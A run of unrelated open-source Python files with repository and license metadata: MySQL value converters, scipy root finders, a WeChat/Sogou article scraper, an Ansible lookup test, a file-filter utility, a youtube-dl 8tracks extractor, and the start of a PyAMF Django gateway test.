%Y-%m-%d %H:%M:%S[.%f] If the instance isn't a datetime.datetime type, it return None. Returns a bytes. """ if value.microsecond: fmt = '{0:d}-{1:02d}-{2:02d} {3:02d}:{4:02d}:{5:02d}.{6:06d}' return fmt.format( value.year, value.month, value.day, value.hour, value.minute, value.second, value.microsecond).encode('ascii') fmt = '{0:d}-{1:02d}-{2:02d} {3:02d}:{4:02d}:{5:02d}' return fmt.format( value.year, value.month, value.day, value.hour, value.minute, value.second).encode('ascii') def _date_to_mysql(self, value): """ Converts a date instance to a string suitable for MySQL. The returned string has format: %Y-%m-%d If the instance isn't a datetime.date type, it return None. Returns a bytes. """ return '{0:d}-{1:02d}-{2:02d}'.format(value.year, value.month, value.day).encode('ascii') def _time_to_mysql(self, value): """ Converts a time instance to a string suitable for MySQL. The returned string has format: %H:%M:%S[.%f] If the instance isn't a datetime.time type, it return None. Returns a bytes. """ if value.microsecond: return value.strftime('%H:%M:%S.%f').encode('ascii') return value.strftime('%H:%M:%S').encode('ascii') def _struct_time_to_mysql(self, value): """ Converts a time.struct_time sequence to a string suitable for MySQL. The returned string has format: %Y-%m-%d %H:%M:%S Returns a bytes or None when not valid. """ return time.strftime('%Y-%m-%d %H:%M:%S', value).encode('ascii') def _timedelta_to_mysql(self, value): """ Converts a timedelta instance to a string suitable for MySQL. The returned string has format: %H:%M:%S Returns a bytes. """ seconds = abs(value.days * 86400 + value.seconds) if value.microseconds: fmt = '{0:02d}:{1:02d}:{2:02d}.{3:06d}' if value.days < 0: mcs = 1000000 - value.microseconds seconds -= 1 else: mcs = value.microseconds else: fmt = '{0:02d}:{1:02d}:{2:02d}' if value.days < 0: fmt = '-' + fmt (hours, remainder) = divmod(seconds, 3600) (mins, secs) = divmod(remainder, 60) if value.microseconds: result = fmt.format(hours, mins, secs, mcs) else: result = fmt.format(hours, mins, secs) if PY2: return result else: return result.encode('ascii') def _decimal_to_mysql(self, value): """ Converts a decimal.Decimal instance to a string suitable for MySQL. Returns a bytes or None when not valid. """ if isinstance(value, Decimal): return str(value).encode('ascii') return None def row_to_python(self, row, fields): """Convert a MySQL text result row to Python types The row argument is a sequence containing text result returned by a MySQL server. Each value of the row is converted to the using the field type information in the fields argument. Returns a tuple. """ i = 0 result = [None]*len(fields) if not self._cache_field_types: self._cache_field_types = {} for name, info in FieldType.desc.items(): try: self._cache_field_types[info[0]] = getattr( self, '_{0}_to_python'.format(name)) except AttributeError: # We ignore field types which has no method pass for field in fields: field_type = field[1] if (row[i] == 0 and field_type != FieldType.BIT) or row[i] is None: # Don't convert NULL value i += 1 continue try: result[i] = self._cache_field_types[field_type](row[i], field) except KeyError: # If one type is not defined, we just return the value as str try: result[i] = row[i].decode('utf-8') except UnicodeDecodeError: result[i] = row[i] except (ValueError, TypeError) as err: err.message = "{0} (field {1})".format(str(err), field[0]) raise i += 1 return tuple(result) def _FLOAT_to_python(self, value, desc=None): # pylint: disable=C0103 """ Returns value as float type. """ return float(value) _DOUBLE_to_python = _FLOAT_to_python def _INT_to_python(self, value, desc=None): # pylint: disable=C0103 """ Returns value as int type. """ return int(value) _TINY_to_python = _INT_to_python _SHORT_to_python = _INT_to_python _INT24_to_python = _INT_to_python _LONG_to_python = _INT_to_python _LONGLONG_to_python = _INT_to_python def _DECIMAL_to_python(self, value, desc=None): # pylint: disable=C0103 """ Returns value as a decimal.Decimal. """ val = value.decode(self.charset) return Decimal(val) _NEWDECIMAL_to_python = _DECIMAL_to_python def _str(self, value, desc=None): """ Returns value as str type. """ return str(value) def _BIT_to_python(self, value, dsc=None): # pylint: disable=C0103 """Returns BIT columntype as integer""" int_val = value if len(int_val) < 8: int_val = b'\x00' * (8 - len(int_val)) + int_val return struct_unpack('>Q', int_val)[0] def _DATE_to_python(self, value, dsc=None): # pylint: disable=C0103 """ Returns DATE column type as datetime.date type. """ try: parts = value.split(b'-') return datetime.date(int(parts[0]), int(parts[1]), int(parts[2])) except ValueError: return None _NEWDATE_to_python = _DATE_to_python def _TIME_to_python(self, value, dsc=None): # pylint: disable=C0103 """ Returns TIME column type as datetime.time type. """ time_val = None try: (hms, mcs) = value.split(b'.') mcs = int(mcs.ljust(6, b'0')) except ValueError: hms = value mcs = 0 try: (hours, mins, secs) = [int(d) for d in hms.split(b':')] if value[0] == 45 or value[0] == '-': # if PY3 or PY2 mins, secs, mcs = -mins, -secs, -mcs time_val = datetime.timedelta(hours=hours, minutes=mins, seconds=secs, microseconds=mcs) except ValueError: raise ValueError( "Could not convert {0} to python datetime.timedelta".format( value)) else: return time_val def _DATETIME_to_python(self, value, dsc=None): # pylint: disable=C0103 """ Returns DATETIME column type as datetime.datetime type. """ datetime_val = None try: (date_, time_) = value.split(b' ') if len(time_) > 8: (hms, mcs) = time_.split(b'.') mcs = int(mcs.ljust(6, b'0')) else: hms = time_ mcs = 0 dtval = [int(i) for i in date_.split(b'-')] + \ [int(i) for i in hms.split(b':')] + [mcs, ] datetime_val = datetime.datetime(*dtval) except ValueError: datetime_val = None return datetime_val _TIMESTAMP_to_python = _DATETIME_to_python def _YEAR_to_python(self, value, desc=None): # pylint: disable=C0103 """Returns YEAR column type as integer""" try: year = int(value) except ValueError: raise ValueError("Failed converting YEAR to int (%s)" % value) return year def _SET_to_python(self, value, dsc=None): # pylint: disable=C0103 """Returns SET column type as set Actually, MySQL protocol sees a SET as a string type field. So this code isn't called directly, but used by STRING_to_python() method. Returns SET column type as a set. """ set_type = None val = value.decode(self.charset) if not val: return set() try: set_type = set(val.split(',')) except ValueError: raise ValueError("Could not convert set %s to a sequence." % value) return set_type def _STRING_to_python(self, value, dsc=None): # pylint: disable=C0103 """ Note that a SET is a string too, but using the FieldFlag we can see whether we have to split it. Returns string typed columns as string type. """ if dsc is not None: # Check if we deal with a SET if dsc[7] & FieldFlag.SET: return self._SET_to_python(value, dsc) if dsc[7] & FieldFlag.BINARY: return value if self.charset == 'binary': return value if isinstance(value, (bytes, bytearray)) and self.use_unicode: return value.decode(self.charset) return value _VAR_STRING_to_python = _STRING_to_python def _BLOB_to_python(self, value, dsc=None): # pylint: disable=C0103 """Convert BLOB data type to Python""" if dsc is not None: if dsc[7] & FieldFlag.BINARY: if PY2: return value else: return bytes(value) return self._STRING_to_python(value, dsc) _LONG_BLOB_to_python = _BLOB_to_python _MEDIUM_BLOB_to_python = _BLOB_to_python _TINY_BLOB_to_python = _BLOB_to_python
apache-2.0
keyurpatel076/MissionPlannerGit
Lib/site-packages/scipy/optimize/zeros.py
55
16072
import warnings import _zeros from numpy import finfo _iter = 100 _xtol = 1e-12 # not actually used at the moment _rtol = finfo(float).eps * 2 __all__ = ['newton', 'bisect', 'ridder', 'brentq', 'brenth'] CONVERGED = 'converged' SIGNERR = 'sign error' CONVERR = 'convergence error' flag_map = {0 : CONVERGED, -1 : SIGNERR, -2 : CONVERR} class RootResults(object): def __init__(self, root, iterations, function_calls, flag): self.root = root self.iterations = iterations self.function_calls = function_calls self.converged = flag == 0 try: self.flag = flag_map[flag] except KeyError: self.flag = 'unknown error %d' % (flag,) def results_c(full_output, r): if full_output: x, funcalls, iterations, flag = r results = RootResults(root=x, iterations=iterations, function_calls=funcalls, flag=flag) return x, results else: return r # Newton-Raphson method def newton(func, x0, fprime=None, args=(), tol=1.48e-8, maxiter=50): """Find a zero using the Newton-Raphson or secant method. Find a zero of the function `func` given a nearby starting point `x0`. The Newton-Rapheson method is used if the derivative `fprime` of `func` is provided, otherwise the secant method is used. Parameters ---------- func : function The function whose zero is wanted. It must be a function of a single variable of the form f(x,a,b,c...), where a,b,c... are extra arguments that can be passed in the `args` parameter. x0 : float An initial estimate of the zero that should be somewhere near the actual zero. fprime : {None, function}, optional The derivative of the function when available and convenient. If it is None, then the secant method is used. The default is None. args : tuple, optional Extra arguments to be used in the function call. tol : float, optional The allowable error of the zero value. maxiter : int, optional Maximum number of iterations. Returns ------- zero : float Estimated location where function is zero. See Also -------- brentq, brenth, ridder, bisect -- find zeroes in one dimension. fsolve -- find zeroes in n dimensions. Notes ----- The convergence rate of the Newton-Rapheson method is quadratic while that of the secant method is somewhat less. This means that if the function is well behaved the actual error in the estimated zero is approximatly the square of the requested tolerance up to roundoff error. However, the stopping criterion used here is the step size and there is no quarantee that a zero has been found. Consequently the result should be verified. Safer algorithms are brentq, brenth, ridder, and bisect, but they all require that the root first be bracketed in an interval where the function changes sign. The brentq algorithm is recommended for general use in one dimemsional problems when such an interval has been found. """ if fprime is not None: # Newton-Rapheson method # Multiply by 1.0 to convert to floating point. We don't use float(x0) # so it still works if x0 is complex. p0 = 1.0 * x0 for iter in range(maxiter): myargs = (p0,) + args fder = fprime(*myargs) if fder == 0: msg = "derivative was zero." warnings.warn(msg, RuntimeWarning) return p0 p = p0 - func(*myargs) / fder if abs(p - p0) < tol: return p p0 = p else: # Secant method p0 = x0 if x0 >= 0: p1 = x0*(1 + 1e-4) + 1e-4 else: p1 = x0*(1 + 1e-4) - 1e-4 q0 = func(*((p0,) + args)) q1 = func(*((p1,) + args)) for iter in range(maxiter): if q1 == q0: if p1 != p0: msg = "Tolerance of %s reached" % (p1 - p0) warnings.warn(msg, RuntimeWarning) return (p1 + p0)/2.0 else: p = p1 - q1*(p1 - p0)/(q1 - q0) if abs(p - p1) < tol: return p p0 = p1 q0 = q1 p1 = p q1 = func(*((p1,) + args)) msg = "Failed to converge after %d iterations, value is %s" % (maxiter, p) raise RuntimeError(msg) def bisect(f, a, b, args=(), xtol=_xtol, rtol=_rtol, maxiter=_iter, full_output=False, disp=True): """Find root of f in [a,b]. Basic bisection routine to find a zero of the function f between the arguments a and b. f(a) and f(b) can not have the same signs. Slow but sure. Parameters ---------- f : function Python function returning a number. f must be continuous, and f(a) and f(b) must have opposite signs. a : number One end of the bracketing interval [a,b]. b : number The other end of the bracketing interval [a,b]. xtol : number, optional The routine converges when a root is known to lie within xtol of the value return. Should be >= 0. The routine modifies this to take into account the relative precision of doubles. maxiter : number, optional if convergence is not achieved in maxiter iterations, and error is raised. Must be >= 0. args : tuple, optional containing extra arguments for the function `f`. `f` is called by ``apply(f, (x)+args)``. full_output : bool, optional If `full_output` is False, the root is returned. If `full_output` is True, the return value is ``(x, r)``, where `x` is the root, and `r` is a RootResults object. disp : {True, bool} optional If True, raise RuntimeError if the algorithm didn't converge. Returns ------- x0 : float Zero of `f` between `a` and `b`. r : RootResults (present if ``full_output = True``) Object containing information about the convergence. In particular, ``r.converged`` is True if the routine converged. See Also -------- brentq, brenth, bisect, newton : one-dimensional root-finding fixed_point : scalar fixed-point finder fsolve -- n-dimensional root-finding """ if type(args) != type(()) : args = (args,) r = _zeros._bisect(f,a,b,xtol,maxiter,args,full_output,disp) return results_c(full_output, r) def ridder(f, a, b, args=(), xtol=_xtol, rtol=_rtol, maxiter=_iter, full_output=False, disp=True): """ Find a root of a function in an interval. Parameters ---------- f : function Python function returning a number. f must be continuous, and f(a) and f(b) must have opposite signs. a : number One end of the bracketing interval [a,b]. b : number The other end of the bracketing interval [a,b]. xtol : number, optional The routine converges when a root is known to lie within xtol of the value return. Should be >= 0. The routine modifies this to take into account the relative precision of doubles. maxiter : number, optional if convergence is not achieved in maxiter iterations, and error is raised. Must be >= 0. args : tuple, optional containing extra arguments for the function `f`. `f` is called by ``apply(f, (x)+args)``. full_output : bool, optional If `full_output` is False, the root is returned. If `full_output` is True, the return value is ``(x, r)``, where `x` is the root, and `r` is a RootResults object. disp : {True, bool} optional If True, raise RuntimeError if the algorithm didn't converge. Returns ------- x0 : float Zero of `f` between `a` and `b`. r : RootResults (present if ``full_output = True``) Object containing information about the convergence. In particular, ``r.converged`` is True if the routine converged. See Also -------- brentq, brenth, bisect, newton : one-dimensional root-finding fixed_point : scalar fixed-point finder Notes ----- Uses [Ridders1979]_ method to find a zero of the function `f` between the arguments `a` and `b`. Ridders' method is faster than bisection, but not generally as fast as the Brent rountines. [Ridders1979]_ provides the classic description and source of the algorithm. A description can also be found in any recent edition of Numerical Recipes. The routine used here diverges slightly from standard presentations in order to be a bit more careful of tolerance. References ---------- .. [Ridders1979] Ridders, C. F. J. "A New Algorithm for Computing a Single Root of a Real Continuous Function." IEEE Trans. Circuits Systems 26, 979-980, 1979. """ if type(args) != type(()) : args = (args,) r = _zeros._ridder(f,a,b,xtol,maxiter,args,full_output,disp) return results_c(full_output, r) def brentq(f, a, b, args=(), xtol=_xtol, rtol=_rtol, maxiter=_iter, full_output=False, disp=True): """ Find a root of a function in given interval. Return float, a zero of `f` between `a` and `b`. `f` must be a continuous function, and [a,b] must be a sign changing interval. Description: Uses the classic Brent (1973) method to find a zero of the function `f` on the sign changing interval [a , b]. Generally considered the best of the rootfinding routines here. It is a safe version of the secant method that uses inverse quadratic extrapolation. Brent's method combines root bracketing, interval bisection, and inverse quadratic interpolation. It is sometimes known as the van Wijngaarden-Deker-Brent method. Brent (1973) claims convergence is guaranteed for functions computable within [a,b]. [Brent1973]_ provides the classic description of the algorithm. Another description can be found in a recent edition of Numerical Recipes, including [PressEtal1992]_. Another description is at http://mathworld.wolfram.com/BrentsMethod.html. It should be easy to understand the algorithm just by reading our code. Our code diverges a bit from standard presentations: we choose a different formula for the extrapolation step. Parameters ---------- f : function Python function returning a number. f must be continuous, and f(a) and f(b) must have opposite signs. a : number One end of the bracketing interval [a,b]. b : number The other end of the bracketing interval [a,b]. xtol : number, optional The routine converges when a root is known to lie within xtol of the value return. Should be >= 0. The routine modifies this to take into account the relative precision of doubles. maxiter : number, optional if convergence is not achieved in maxiter iterations, and error is raised. Must be >= 0. args : tuple, optional containing extra arguments for the function `f`. `f` is called by ``apply(f, (x)+args)``. full_output : bool, optional If `full_output` is False, the root is returned. If `full_output` is True, the return value is ``(x, r)``, where `x` is the root, and `r` is a RootResults object. disp : {True, bool} optional If True, raise RuntimeError if the algorithm didn't converge. Returns ------- x0 : float Zero of `f` between `a` and `b`. r : RootResults (present if ``full_output = True``) Object containing information about the convergence. In particular, ``r.converged`` is True if the routine converged. See Also -------- multivariate local optimizers `fmin`, `fmin_powell`, `fmin_cg`, `fmin_bfgs`, `fmin_ncg` nonlinear least squares minimizer `leastsq` constrained multivariate optimizers `fmin_l_bfgs_b`, `fmin_tnc`, `fmin_cobyla` global optimizers `anneal`, `brute` local scalar minimizers `fminbound`, `brent`, `golden`, `bracket` n-dimensional root-finding `fsolve` one-dimensional root-finding `brentq`, `brenth`, `ridder`, `bisect`, `newton` scalar fixed-point finder `fixed_point` Notes ----- f must be continuous. f(a) and f(b) must have opposite signs. .. [Brent1973] Brent, R. P., *Algorithms for Minimization Without Derivatives*. Englewood Cliffs, NJ: Prentice-Hall, 1973. Ch. 3-4. .. [PressEtal1992] Press, W. H.; Flannery, B. P.; Teukolsky, S. A.; and Vetterling, W. T. *Numerical Recipes in FORTRAN: The Art of Scientific Computing*, 2nd ed. Cambridge, England: Cambridge University Press, pp. 352-355, 1992. Section 9.3: "Van Wijngaarden-Dekker-Brent Method." """ if type(args) != type(()) : args = (args,) r = _zeros._brentq(f,a,b,xtol,maxiter,args,full_output,disp) return results_c(full_output, r) def brenth(f, a, b, args=(), xtol=_xtol, rtol=_rtol, maxiter=_iter, full_output=False, disp=True): """Find root of f in [a,b]. A variation on the classic Brent routine to find a zero of the function f between the arguments a and b that uses hyperbolic extrapolation instead of inverse quadratic extrapolation. There was a paper back in the 1980's ... f(a) and f(b) can not have the same signs. Generally on a par with the brent routine, but not as heavily tested. It is a safe version of the secant method that uses hyperbolic extrapolation. The version here is by Chuck Harris. Parameters ---------- f : function Python function returning a number. f must be continuous, and f(a) and f(b) must have opposite signs. a : number One end of the bracketing interval [a,b]. b : number The other end of the bracketing interval [a,b]. xtol : number, optional The routine converges when a root is known to lie within xtol of the value return. Should be >= 0. The routine modifies this to take into account the relative precision of doubles. maxiter : number, optional if convergence is not achieved in maxiter iterations, and error is raised. Must be >= 0. args : tuple, optional containing extra arguments for the function `f`. `f` is called by ``apply(f, (x)+args)``. full_output : bool, optional If `full_output` is False, the root is returned. If `full_output` is True, the return value is ``(x, r)``, where `x` is the root, and `r` is a RootResults object. disp : {True, bool} optional If True, raise RuntimeError if the algorithm didn't converge. Returns ------- x0 : float Zero of `f` between `a` and `b`. r : RootResults (present if ``full_output = True``) Object containing information about the convergence. In particular, ``r.converged`` is True if the routine converged. See Also -------- fmin, fmin_powell, fmin_cg, fmin_bfgs, fmin_ncg -- multivariate local optimizers leastsq -- nonlinear least squares minimizer fmin_l_bfgs_b, fmin_tnc, fmin_cobyla -- constrained multivariate optimizers anneal, brute -- global optimizers fminbound, brent, golden, bracket -- local scalar minimizers fsolve -- n-dimensional root-finding brentq, brenth, ridder, bisect, newton -- one-dimensional root-finding fixed_point -- scalar fixed-point finder """ if type(args) != type(()) : args = (args,) r = _zeros._brenth(f,a, b, xtol, maxiter, args, full_output, disp) return results_c(full_output, r)
gpl-3.0
lotosbin/weixin_sogou
weixin_sogou.py
8
5775
from selenium import webdriver import selenium from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from bs4 import BeautifulSoup import requests import logging import re import time from urllib.parse import quote import random BASE_URL = 'http://weixin.sogou.com' UA = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" def get_html(url): dcap = dict(DesiredCapabilities.PHANTOMJS) dcap["phantomjs.page.settings.userAgent"] = ( UA ) dcap["takesScreenshot"] = (False) #t0 = time.time() try: driver = webdriver.PhantomJS(desired_capabilities=dcap, service_args=['--load-images=no']) driver.set_page_load_timeout(240) driver.command_executor._commands['executePhantomScript'] = ('POST', '/session/$sessionId/phantom/execute') driver.execute('executePhantomScript', {'script': ''' var page = this; // won't work otherwise page.onResourceRequested = function(requestData, request) { if ((/http:\/\/.+?\.css/gi).test(requestData['url']) || requestData['Content-Type'] == 'text/css') { console.log('The url of the request is matching. Aborting: ' + requestData['url']); request.abort(); } } ''', 'args': []}) except selenium.common.exceptions.WebDriverException: return None try: driver.get(url) html = driver.page_source except Exception as e: html = None logging.error(e) finally: driver.quit() return html def get_html_direct(url,cookies=None): if not cookies: cookies = update_cookies() headers = {"User-Agent": UA} r = requests.get(url, headers=headers, cookies=cookies, timeout=20) return r.text def get_account_info(open_id=None, link=None, cookies=None): url = None if open_id: url = BASE_URL + '/gzh?openid=' + open_id if link: url = link #html = get_html(url) html = get_html_direct(url, cookies=cookies) #print(html) if not html: return None soup = BeautifulSoup(html) info_box = soup.select('#weixinname')[0].parent account_info = {} account_info['account'] = info_box.select('h4 span')[0].text.split(':')[1].strip() account_info['name'] = info_box.select('#weixinname')[0].text account_info['address'] = url account_info['description'] = info_box.select('.sp-txt')[0].text img_list = soup.select('.pos-box img') account_info['logo'] = soup.select(".img-box img")[0]['src'] account_info['qr_code'] = img_list[1]['src'] return account_info def parse_list(open_id=None, link=None): if open_id: url = BASE_URL + '/gzh?openid=' + open_id elif link: url = link else: return None html = get_html(url) if not html: return None soup = BeautifulSoup(html) ls = soup.select('#wxbox .txt-box') link_list = [] for item in ls: item_dict = {} item_dict['title'] = item.a.text item_dict['link'] = item.a['href'] link_list.append(item_dict) return link_list def parse_essay(link): s = requests.Session() s.headers.update({"User-Agent": UA}) try: r = s.get(link) html = r.text soup = BeautifulSoup(html) essay = {} p = re.compile(r'\?wx_fmt.+?\"') content = str(soup.select("#js_content")[0]).replace('data-src', 'src') essay['content'] = re.sub(p, '"', content) essay['name'] = soup.select('#post-user')[0].text essay['date'] = soup.select('#post-date')[0].text except Exception: return None return essay def weixin_search(name, cookies=None): url = BASE_URL + '/weixin?query=' + name #html = get_html(url) html = get_html_direct(url, cookies=cookies) print(html) soup = BeautifulSoup(html) ls = soup.select("._item") search_list = [] for item in ls: account_info = {} account_info['account'] = item.select('h4 span')[0].text.split(':')[1].strip() account_info['name'] = item.select('.txt-box h3')[0].text account_info['address'] = BASE_URL + item['href'] account_info['open_id'] = item['href'].split('openid=')[1] account_info['description'] = item.select('.sp-txt')[0].text account_info['logo'] = item.select('.img-box img')[0]['src'] try: account_info['latest_title'] = item.select('.sp-txt a')[0].text account_info['latest_link'] = item.select('.sp-txt a')[0]['href'] except IndexError: pass search_list.append(account_info) #print(account_info) return search_list def update_cookies(): s = requests.Session() headers = {"User-Agent": UA} s.headers.update(headers) url = BASE_URL + '/weixin?query=123' r = s.get(url) if 'SNUID' not in s.cookies: p = re.compile(r'(?<=SNUID=)\w+') s.cookies['SNUID'] = p.findall(r.text)[0] suv = ''.join([str(int(time.time()*1000000) + random.randint(0, 1000))]) s.cookies['SUV'] = suv return s.cookies if __name__ == '__main__': open_id = 'oIWsFt3nvJ2jaaxm9UOB_LUos02k' #print(weixin_search('简书')) cookies = update_cookies() t0 = time.time() print(get_account_info(open_id,cookies=cookies)) #print(weixin_search("简书",cookies)) t1 = time.time() print(parse_list(open_id)) t2 = time.time() print(parse_essay('http://mp.weixin.qq.com/s?__biz=MjM5NjM4OTAyMA==&mid=205212599&idx=4&sn=6a1de7a7532ba0bcbc633c253b61916f&3rd=MzA3MDU4NTYzMw==&scene=6#rd')) t3 = time.time() print(t1-t0, t2-t1, t3-t2)
mit
anryko/ansible
test/units/plugins/lookup/test_avi.py
23
3126
# -*- coding: utf-8 -*- # (c) 2019, Sandeep Bandi <sandeepb@avinetworks.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import pytest import json from units.compat.mock import patch, MagicMock from ansible.errors import AnsibleError from ansible.plugins.loader import lookup_loader from ansible.plugins.lookup import avi try: import builtins as __builtin__ except ImportError: import __builtin__ fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures') with open(fixture_path + '/avi.json') as json_file: data = json.load(json_file) @pytest.fixture def dummy_credentials(): dummy_credentials = {} dummy_credentials['controller'] = "192.0.2.13" dummy_credentials['username'] = "admin" dummy_credentials['password'] = "password" dummy_credentials['api_version'] = "17.2.14" dummy_credentials['tenant'] = 'admin' return dummy_credentials @pytest.fixture def super_switcher(scope="function", autouse=True): # Mocking the inbuilt super as it is used in ApiSession initialization original_super = __builtin__.super __builtin__.super = MagicMock() yield # Revert the super to default state __builtin__.super = original_super def test_lookup_multiple_obj(dummy_credentials): avi_lookup = lookup_loader.get('avi') avi_mock = MagicMock() avi_mock.return_value.get.return_value.json.return_value = data["mock_multiple_obj"] with patch.object(avi, 'ApiSession', avi_mock): retval = avi_lookup.run([], {}, avi_credentials=dummy_credentials, obj_type="network") assert retval == data["mock_multiple_obj"]["results"] def test_lookup_single_obj(dummy_credentials): avi_lookup = lookup_loader.get('avi') avi_mock = MagicMock() avi_mock.return_value.get_object_by_name.return_value = data["mock_single_obj"] with patch.object(avi, 'ApiSession', avi_mock): retval = avi_lookup.run([], {}, avi_credentials=dummy_credentials, obj_type="network", obj_name='PG-123') assert retval[0] == data["mock_single_obj"] def test_invalid_lookup(dummy_credentials): avi_lookup = lookup_loader.get('avi') avi_mock = MagicMock() with pytest.raises(AnsibleError): with patch.object(avi, 'ApiSession', avi_mock): avi_lookup.run([], {}, avi_credentials=dummy_credentials)
gpl-3.0
EHRI/rspub-core
rspub/util/resourcefilter.py
2
1207
#! /usr/bin/env python3 # -*- coding: utf-8 -*- import os import re import dateutil.parser def hidden_file_predicate(): # in Python 3.5 this should work # return lambda file_path : bool(os.stat(file_path).st_file_attributes & os.stat.FILE_ATTRIBUTE_HIDDEN) return lambda file_path: isinstance(file_path, str) and os.path.basename(file_path).startswith(".") def directory_pattern_predicate(name_pattern=""): pattern = re.compile(windows_to_unix(name_pattern)) return lambda file_path: isinstance(file_path, str) and pattern.search(windows_to_unix(os.path.dirname(file_path))) def windows_to_unix(path): return path.replace("\\", "/") def filename_pattern_predicate(name_pattern=""): pattern = re.compile(name_pattern) return lambda file_path: isinstance(file_path, str) and pattern.search(os.path.basename(file_path)) def last_modified_after_predicate(t=0): if isinstance(t, str): t = dateutil.parser.parse(t).timestamp() def _file_attribute_filter(file_path): if not os.path.exists(file_path): return False else: lm = os.stat(file_path).st_mtime return lm > t return _file_attribute_filter
apache-2.0
hsluo/youtube-dl
youtube_dl/extractor/eighttracks.py
121
5868
# coding: utf-8 from __future__ import unicode_literals import json import random from .common import InfoExtractor from ..compat import ( compat_str, ) from ..utils import ( ExtractorError, ) class EightTracksIE(InfoExtractor): IE_NAME = '8tracks' _VALID_URL = r'https?://8tracks\.com/(?P<user>[^/]+)/(?P<id>[^/#]+)(?:#.*)?$' _TEST = { "name": "EightTracks", "url": "http://8tracks.com/ytdl/youtube-dl-test-tracks-a", "info_dict": { 'id': '1336550', 'display_id': 'youtube-dl-test-tracks-a', "description": "test chars: \"'/\\ä↭", "title": "youtube-dl test tracks \"'/\\ä↭<>", }, "playlist": [ { "md5": "96ce57f24389fc8734ce47f4c1abcc55", "info_dict": { "id": "11885610", "ext": "m4a", "title": "youtue-dl project<>\"' - youtube-dl test track 1 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "4ab26f05c1f7291ea460a3920be8021f", "info_dict": { "id": "11885608", "ext": "m4a", "title": "youtube-dl project - youtube-dl test track 2 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "d30b5b5f74217410f4689605c35d1fd7", "info_dict": { "id": "11885679", "ext": "m4a", "title": "youtube-dl project as well - youtube-dl test track 3 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "4eb0a669317cd725f6bbd336a29f923a", "info_dict": { "id": "11885680", "ext": "m4a", "title": "youtube-dl project as well - youtube-dl test track 4 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "1893e872e263a2705558d1d319ad19e8", "info_dict": { "id": "11885682", "ext": "m4a", "title": "PH - youtube-dl test track 5 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "b673c46f47a216ab1741ae8836af5899", "info_dict": { "id": "11885683", "ext": "m4a", "title": "PH - youtube-dl test track 6 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "1d74534e95df54986da7f5abf7d842b7", "info_dict": { "id": "11885684", "ext": "m4a", "title": "phihag - youtube-dl test track 7 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "f081f47af8f6ae782ed131d38b9cd1c0", "info_dict": { "id": "11885685", "ext": "m4a", "title": "phihag - youtube-dl test track 8 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } } ] } def _real_extract(self, url): playlist_id = self._match_id(url) webpage = self._download_webpage(url, playlist_id) data = self._parse_json( self._search_regex( r"(?s)PAGE\.mix\s*=\s*({.+?});\n", webpage, 'trax information'), playlist_id) session = str(random.randint(0, 1000000000)) mix_id = data['id'] track_count = data['tracks_count'] duration = data['duration'] avg_song_duration = float(duration) / track_count # duration is sometimes negative, use predefined avg duration if avg_song_duration <= 0: avg_song_duration = 300 first_url = 'http://8tracks.com/sets/%s/play?player=sm&mix_id=%s&format=jsonh' % (session, mix_id) next_url = first_url entries = [] for i in range(track_count): api_json = None download_tries = 0 while api_json is None: try: api_json = self._download_webpage( next_url, playlist_id, note='Downloading song information %d/%d' % (i + 1, track_count), errnote='Failed to download song information') except ExtractorError: if download_tries > 3: raise else: download_tries += 1 self._sleep(avg_song_duration, playlist_id) api_data = json.loads(api_json) track_data = api_data['set']['track'] info = { 'id': compat_str(track_data['id']), 'url': track_data['track_file_stream_url'], 'title': track_data['performer'] + ' - ' + track_data['name'], 'raw_title': track_data['name'], 'uploader_id': data['user']['login'], 'ext': 'm4a', } entries.append(info) next_url = 'http://8tracks.com/sets/%s/next?player=sm&mix_id=%s&format=jsonh&track_id=%s' % ( session, mix_id, track_data['id']) return { '_type': 'playlist', 'entries': entries, 'id': compat_str(mix_id), 'display_id': playlist_id, 'title': data.get('name'), 'description': data.get('description'), }
unlicense
noba3/KoTos
addons/script.module.pyamf/lib/pyamf/tests/gateway/test_django.py
26
6094
# -*- coding: utf-8 -*- # # Copyright (c) The PyAMF Project. # See LICENSE.txt for details. """ Django gateway tests. @since: 0.1.0 """ import unittest import sys import os try: from django import http from pyamf.remoting.gateway import django except ImportError: django = None import pyamf from pyamf import remoting, util class BaseTestCase(unittest.TestCase): """ """ def setUp(self): if not django: self.skipTest("'django' not available") class DjangoGatewayTestCase(BaseTestCase): def setUp(self): BaseTestCase.setUp(self) import new self.mod_name = '%s.%s' % (__name__, 'settings') sys.modules[self.mod_name] = new.module(self.mod_name) self.old_env = os.environ.get('DJANGO_SETTINGS_MODULE', None) os.environ['DJANGO_SETTINGS_MODULE'] = self.mod_name def tearDown(self): if self.old_env is not None: os.environ['DJANGO_SETTINGS_MODULE'] = self.old_env del sys.modules[self.mod_name] def test_csrf(self): gw = django.DjangoGateway() self.assertTrue(gw.csrf_exempt) def test_settings(self): from django import conf settings_mod = sys.modules[self.mod_name] settings_mod.DEBUG = True settings_mod.AMF_TIME_OFFSET = 1000 old_settings = conf.settings conf.settings = conf.Settings(self.mod_name) gw = django.DjangoGateway() try: self.assertTrue(gw.debug) self.assertEqual(gw.timezone_offset, 1000) finally: conf.settings = old_settings def test_request_method(self): gw = django.DjangoGateway() http_request = http.HttpRequest() http_request.method = 'GET' http_response = gw(http_request) self.assertEqual(http_response.status_code, 405) def test_bad_request(self): gw = django.DjangoGateway() request = util.BufferedByteStream() 